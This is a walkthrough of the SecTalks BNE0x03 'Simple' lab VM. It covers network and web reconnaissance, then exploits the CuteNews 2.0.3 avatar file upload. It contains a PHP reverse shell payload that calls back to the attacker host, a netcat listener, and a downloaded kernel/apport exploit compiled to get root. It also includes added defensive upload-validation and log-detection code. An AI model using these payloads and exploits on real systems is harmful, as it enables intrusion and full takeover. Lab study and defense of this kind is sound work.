Red Team Target Practice: SECTALKS: BNE0X03 - SIMPLE

Information Gathering

1. ARP scan
Discover the live hosts reachable from the local interface

┌──(root㉿ru)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.11.81
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1    fc:86:2a:4a:6f:ec       Huawei Device Co., Ltd.
192.168.11.15   30:03:c8:49:52:4d       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.11.36   3c:55:76:dc:ab:f5       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.11.46   14:de:39:c3:4f:31       Huawei Device Co., Ltd.
192.168.11.22   e0:d0:45:5c:f5:53       Intel Corporate
192.168.11.33   f4:a4:75:fe:6b:2c       Intel Corporate
192.168.11.68   7c:b5:66:a5:f0:a5       Intel Corporate
192.168.11.86   00:0c:29:cc:9c:f1       VMware, Inc.
192.168.11.18   3c:e9:f7:c0:ef:c7       Intel Corporate
192.168.11.20   3c:21:9c:fd:7b:6d       Intel Corporate

2. netdiscover
netdiscover -r 192.168.11.0/24 

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                        
                                                                                                                                      
 11 Captured ARP Req/Rep packets, from 9 hosts.   Total size: 660                                                                     
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.11.1    fc:86:2a:4a:6f:ec      3     180  Huawei Device Co., Ltd.                                                            
 192.168.11.36   3c:55:76:dc:ab:f5      1      60  CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.                                       
 192.168.11.22   e0:d0:45:5c:f5:53      1      60  Intel Corporate                                                                    
 192.168.11.33   f4:a4:75:fe:6b:2c      1      60  Intel Corporate                                                                    
 192.168.11.20   3c:21:9c:fd:7b:6d      1      60  Intel Corporate                                                                    
 192.168.11.46   14:de:39:c3:4f:31      1      60  Huawei Device Co., Ltd.                                                            
 192.168.11.86   00:0c:29:cc:9c:f1      1      60  VMware, Inc.                                                                       
 192.168.11.68   7c:b5:66:a5:f0:a5      1      60  Intel Corporate                                                                    
 192.168.11.69   e6:bf:32:e2:1b:48      1      60  Unknown vendor

3. nmap
Host discovery

┌──(root㉿ru)-[~/lianxi]
└─# nmap -sn 192.168.11.0/24 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:27 CST
Nmap scan report for 192.168.11.1
Host is up (0.0092s latency).
MAC Address: FC:86:2A:4A:6F:EC (Huawei Device)
Nmap scan report for 192.168.11.15
Host is up (0.13s latency).
MAC Address: 30:03:C8:49:52:4D (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.11.20
Host is up (0.12s latency).
MAC Address: 3C:21:9C:FD:7B:6D (Intel Corporate)
Nmap scan report for 192.168.11.22
Host is up (0.12s latency).
MAC Address: E0:D0:45:5C:F5:53 (Intel Corporate)
Nmap scan report for 192.168.11.33
Host is up (0.12s latency).
MAC Address: F4:A4:75:FE:6B:2C (Intel Corporate)
Nmap scan report for 192.168.11.36
Host is up (0.00016s latency).
MAC Address: 3C:55:76:DC:AB:F5 (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.11.46
Host is up (0.024s latency).
MAC Address: 14:DE:39:C3:4F:31 (Huawei Device)
Nmap scan report for 192.168.11.68
Host is up (0.11s latency).
MAC Address: 7C:B5:66:A5:F0:A5 (Intel Corporate)
Nmap scan report for 192.168.11.69
Host is up (0.12s latency).
MAC Address: E6:BF:32:E2:1B:48 (Unknown)
Nmap scan report for 192.168.11.86
Host is up (0.00014s latency).
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Nmap scan report for 192.168.11.81
Host is up.
Nmap done: 256 IP addresses (11 hosts up) scanned in 0.77 seconds

Port scan

┌──(root㉿ru)-[~/lianxi]
└─# nmap -p- 192.168.11.86 --min-rate 10000  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:28 CST
Nmap scan report for 192.168.11.86
Host is up (0.0015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:CC:9C:F1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.40 seconds


Service and version detection

┌──(root㉿ru)-[~/lianxi]
└─# nmap -sC -sV -sT -O -p80 192.168.11.86 --min-rate 10000 -oA xx  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:31 CST
Nmap scan report for 192.168.11.86
Host is up (0.00028s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

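-sC : scan with the default scripts
-sV : detect service and version information
-sT : TCP connect scan
-O  : enable OS detection
-p  : specify the port(s)
--min-rate 10000 : send at least 10,000 packets per second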

UDP scan

┌──(root㉿ru)-[~/lianxi]
└─# nmap -sU 192.168.11.86 --min-rate 10000 -oA udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:29 CST
Nmap scan report for 192.168.11.86
Host is up (0.00023s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
682/udp   closed xfr
772/udp   closed cycleserv2
9103/udp  closed bacula-sd
20518/udp closed unknown
41774/udp closed unknown
49179/udp closed unknown
MAC Address: 00:0C:29:CC:9C:F1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds


Vulnerability scan

┌──(root㉿ru)-[~/lianxi]
└─# nmap --script=vuln -p80 192.168.11.86 --min-rate 10000                                                                        
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:34 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.11.86
Host is up (0.00065s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.11.86
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.11.86:80/
|     Form id: login_form
|     Form action: /index.php
|     
|     Path: http://192.168.11.86:80/?register
|     Form id: regpassword
|     Form action: /index.php?register
|     
|     Path: http://192.168.11.86:80/?register&lostpass
|     Form id: 
|     Form action: /index.php
|     
|     Path: http://192.168.11.86:80/index.php
|     Form id: login_form
|     Form action: /index.php
|     
|     Path: http://192.168.11.86:80/index.php?register
|     Form id: regpassword
|_    Form action: /index.php?register
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /rss.php: RSS or Atom feed
MAC Address: 00:0C:29:CC:9C:F1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 344.99 seconds


4. nikto
┌──(root㉿ru)-[~/lianxi]
└─# nikto -h 192.168.11.86 nikto.txt       
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.11.86
+ Target Hostname:    192.168.11.86
+ Target Port:        80
+ Start Time:         2023-11-27 14:35:16 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: Cookie CUTENEWS_SESSION created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.6.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /docs/: Directory indexing found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
+ 8103 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-11-27 14:35:31 (GMT8) (15 seconds)
---------------------------------------------------------------------------


Directory enumeration

1. gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.11.86 -w directory-list-lowercase-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.11.86
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 301) [Size: 312] [--> http://192.168.11.86/docs/]
/uploads              (Status: 301) [Size: 315] [--> http://192.168.11.86/uploads/]
/skins                (Status: 301) [Size: 313] [--> http://192.168.11.86/skins/]
/core                 (Status: 301) [Size: 312] [--> http://192.168.11.86/core/]
/cdata                (Status: 301) [Size: 313] [--> http://192.168.11.86/cdata/]
/server-status        (Status: 403) [Size: 293]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================


2. dirb
└─# cat dirb.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: /root/lianxi/dirb.txt
START_TIME: Mon Nov 27 17:19:21 2023
URL_BASE: http://192.168.11.86/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.11.86/ ----
==> DIRECTORY: http://192.168.11.86/core/
==> DIRECTORY: http://192.168.11.86/docs/
+ http://192.168.11.86/favicon.ico (CODE:200|SIZE:1150)
+ http://192.168.11.86/index.php (CODE:200|SIZE:2487)
+ http://192.168.11.86/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://192.168.11.86/skins/
==> DIRECTORY: http://192.168.11.86/uploads/

---- Entering directory: http://192.168.11.86/core/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.11.86/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.11.86/skins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.11.86/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Nov 27 17:19:25 2023
DOWNLOADED: 4612 - FOUND: 3

3. dirsearch
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.11.86 -e* -o /root/lianxi/dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490

Output File: /root/lianxi/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-23-11-27_17-19-56.log

Target: http://192.168.11.86/

[17:19:56] Starting:                                         
[17:19:58] 403 -  285B  - /.php3                                           
[17:20:00] 200 -    3KB - /LICENSE.txt                                      
[17:20:00] 200 -    2KB - /README.md                                        
[17:20:12] 301 -  312B  - /core  ->  http://192.168.11.86/core/             
[17:20:13] 200 -    1KB - /docs/                                            
[17:20:13] 301 -  312B  - /docs  ->  http://192.168.11.86/docs/             
[17:20:14] 200 -   12KB - /example.php                                      
[17:20:14] 200 -    1KB - /favicon.ico                                      
[17:20:17] 200 -    2KB - /index.php                                        
[17:20:17] 200 -    2KB - /index.php/login/                                 
[17:20:24] 200 -   28B  - /print.php                                        
[17:20:26] 200 -  105B  - /rss.php                                          
[17:20:26] 200 -    5KB - /search.php                                       
[17:20:26] 403 -  293B  - /server-status                                    
[17:20:26] 403 -  294B  - /server-status/                                   
[17:20:28] 301 -  313B  - /skins  ->  http://192.168.11.86/skins/           
[17:20:31] 301 -  315B  - /uploads  ->  http://192.168.11.86/uploads/       
[17:20:31] 200 -  743B  - /uploads/                                         
                                                                             
Task Completed 

4. feroxbuster
feroxbuster -u http://192.168.11.86 -x php -w <wordlist>

whatweb

┌──(root㉿ru)-[~/lianxi]
└─# whatweb http://192.168.11.86/               
http://192.168.11.86/ [200 OK] 
Apache[2.4.7], Cookies[CUTENEWS_SESSION], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[192.168.11.86],
PHP[5.5.9-1ubuntu4.6], PasswordField[password], Script[text/javascript],
Title[Please Login / CuteNews], UncommonHeaders[accept-charset], 
X-Frame-Options[sameorigin], X-Powered-By[PHP/5.5.9-1ubuntu4.6]


WEB

1. CMS


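This is clearly a content management system. Since the page gives the CMS name and version, a known vulnerability very likely exists for it.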

2. searchsploit
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit CuteNews 2.0.3                            
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.0.3 - Arbitrary File Upload                                                               | php/webapps/37474.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


poc

┌──(root㉿ru)-[~/lianxi]
└─# cat 37474.txt 
          CuteNews 2.0.3 Remote File Upload Vulnerability
        =================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm T0x!c member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1



# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3]
# Tested on: [Windows 7]
# greetz to :Tr00n , Kha&mix , Cc0de  , Ghosty , Ked ans , Caddy-dz .....
==========================================================
 # Exploit  :

Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal

 1 - Sign up for New User
 2 - Log In
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php

-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\

6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php

 Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php


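From the PoC, the flow is roughly: first register an account and log in, then use the file upload vulnerability to upload a shell, then start a listener and wait for the reverse shell to connect back.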
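The PoC works because the avatar handler keeps the client-supplied file name and extension when it stores the upload. The following added example (not from the original post and not CuteNews code) shows a server-side check that refuses the renamed file; `validate_avatar`, the allowed types and the size limit are assumptions.

```python
import os
import secrets

# Assumed policy: extension -> accepted magic-byte prefixes.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 512 * 1024  # assumed size limit for an avatar


class UploadRejected(ValueError):
    """Raised when an avatar upload fails validation."""


def validate_avatar(client_filename: str, data: bytes) -> str:
    """Return the server-chosen name to store a validated avatar under.

    The client-supplied name only tells us the claimed type; no part of it
    (and no part of the username) ends up in the stored path.
    """
    # Normalise Windows separators and drop any directory component.
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext or '(none)'} is not an allowed image type")
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    # The bytes must start with a signature of the claimed type, so a script
    # renamed to .jpg is refused as well.
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the claimed image type")
    # Random name plus canonical extension: nothing client-controlled
    # decides which handler the web server picks for the stored file.
    canonical = ".jpg" if ext == ".jpeg" else ext
    return f"avatar_{secrets.token_hex(16)}{canonical}"


if __name__ == "__main__":
    # Constructed inputs, not taken from the lab.
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32
    script = b"<?php echo 'constructed test body'; ?>"
    for name, body in [("me.JPG", jpeg), ("Evil.php", script), ("Evil.jpg", script)]:
        try:
            print(name, "->", validate_avatar(name, body))
        except UploadRejected as exc:
            print(name, "-> rejected:", exc)
```

A matching signature does not prove the rest of the file is a clean image, so the upload directory should also be served with script execution disabled.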

Reverse shell

1. payload
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.11.81/3636 0>&1'"); ?>


2. Upload


Upload succeeded!

3. Reverse shell
Click the uploaded payload

┌──(root㉿ru)-[~/lianxi]
└─# nc -lvnp 3636
listening on [any] 3636 ...
connect to [192.168.11.81] from (UNKNOWN) [192.168.11.86] 36287
bash: cannot set terminal process group (1184): Inappropriate ioctl for device
bash: no job control in this shell
www-data@simple:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@simple:/var/www/html/uploads$ pwd
pwd
/var/www/html/uploads
www-data@simple:/var/www/html/uploads$ 
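On the server side, the sequence above leaves a recognisable trace in the web access log: a POST to the avatar form followed by a successful request for a script under /uploads/. The following added example (not part of the original post) flags that pattern; the Apache combined log format, the sample lines and the function name are assumptions.

```python
import re

# Apache combined log format: client, identity, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A script-type file requested from the upload directory.
UPLOADED_SCRIPT_RE = re.compile(
    r"^/uploads/[^?]*\.(?:php\d?|phtml|phar)(?:[/?]|$)", re.IGNORECASE
)
# Query string of the avatar form named in the PoC.
AVATAR_FORM = "mod=main&opt=personal"

# Constructed sample log; addresses are from the documentation range.
SAMPLE_LOG = """\
192.0.2.10 - - [27/Nov/2023:17:40:01 +0800] "GET /index.php?register HTTP/1.1" 200 2487 "-" "Mozilla/5.0"
192.0.2.10 - - [27/Nov/2023:17:41:10 +0800] "POST /index.php?mod=main&opt=personal HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [27/Nov/2023:17:41:30 +0800] "GET /uploads/avatar_testuser_photo.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.20 - - [27/Nov/2023:17:45:02 +0800] "POST /index.php?mod=main&opt=personal HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.20 - - [27/Nov/2023:17:45:09 +0800] "GET /uploads/avatar_alice_me.jpg HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
192.0.2.30 - - [27/Nov/2023:17:50:00 +0800] "GET /uploads/shell.php HTTP/1.1" 404 293 "-" "Mozilla/5.0"
"""


def find_upload_execution(log_text):
    """Return one alert per successful request for a script under /uploads/."""
    posted_avatar = set()  # clients that already submitted the avatar form
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line
        ip, method, path = m["ip"], m["method"], m["path"]
        if method == "POST" and AVATAR_FORM in path:
            posted_avatar.add(ip)
        elif UPLOADED_SCRIPT_RE.match(path) and m["status"].startswith("2"):
            # A 2xx here means the server served or ran the uploaded script.
            alerts.append({
                "ip": ip,
                "time": m["ts"],
                "path": path,
                "after_avatar_post": ip in posted_avatar,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_upload_execution(SAMPLE_LOG):
        print(alert)
```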



Privilege escalation

Kernel privilege escalation
www-data@simple:/home/bull$ uname -a
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 athlon i686 GNU/Linux
www-data@simple:/home/bull$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.2 LTS
Release:        14.04
Codename:       trusty
www-data@simple:/home/bull$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@simple:/home/bull$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/sbin/uuidd
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/mtr
/usr/bin/at
/usr/bin/passwd
/bin/fusermount
/bin/su
/bin/ping6
/bin/ping
/bin/mount
/bin/umount
www-data@simple:/home/bull$ 

www-data@simple:/tmp$ wget http://192.168.11.86:8080/37088.c
wget http://192.168.11.86:8080/37088.c
--2023-11-27 03:12:14--  http://192.168.11.86:8080/37088.c
Connecting to 192.168.11.86:8080... failed: Connection refused.
www-data@simple:/tmp$ wget http://192.168.11.81:8080/37088.c
wget http://192.168.11.81:8080/37088.c
--2023-11-27 03:12:33--  http://192.168.11.81:8080/37088.c
Connecting to 192.168.11.81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6027 (5.9K) [text/x-csrc]
Saving to: '37088.c'

     0K .....                                                 100% 1.02G=0s

2023-11-27 03:12:33 (1.02 GB/s) - '37088.c' saved [6027/6027]

www-data@simple:/tmp$ ls -al
ls -al
total 16
drwxrwxrwt  2 root     root     4096 Nov 27 03:12 .
drwxr-xr-x 21 root     root     4096 Sep  9  2015 ..
-rw-r--r--  1 www-data www-data 6027 Nov 27  2023 37088.c
www-data@simple:/tmp$ chmod +x 37088.c
chmod +x 37088.c
www-data@simple:/tmp$ gcc 37088.c -o 37088  
gcc 37088.c -o 37088
www-data@simple:/tmp$ ls
ls
37088
37088.c
www-data@simple:/tmp$ ./37088  
./37088
created /var/crash/_bin_sleep.33.crash
crasher: my pid is 1585
apport stopped, pid = 1586
getting pid 1585
current pid = 1584..2500..5000..7500..10000..12500..15000..17500..20000..22500..25000..27500..30000..32500..
** child: current pid = 1585
** child: executing /bin/su
su: must be run from a terminal
sleeping 2s..

checker: mode 4516
waiting for file to be unlinked..writing to fifo
fifo written.. wait...
waiting for /etc/sudoers.d/core to appear..

checker: new mode 32768 .. done
checker: SIGCONT
checker: writing core
checker: done
success
stty: standard input: Inappropriate ioctl for device
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)


get flag
# cd /root
# ls
flag.txt
# cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
# 

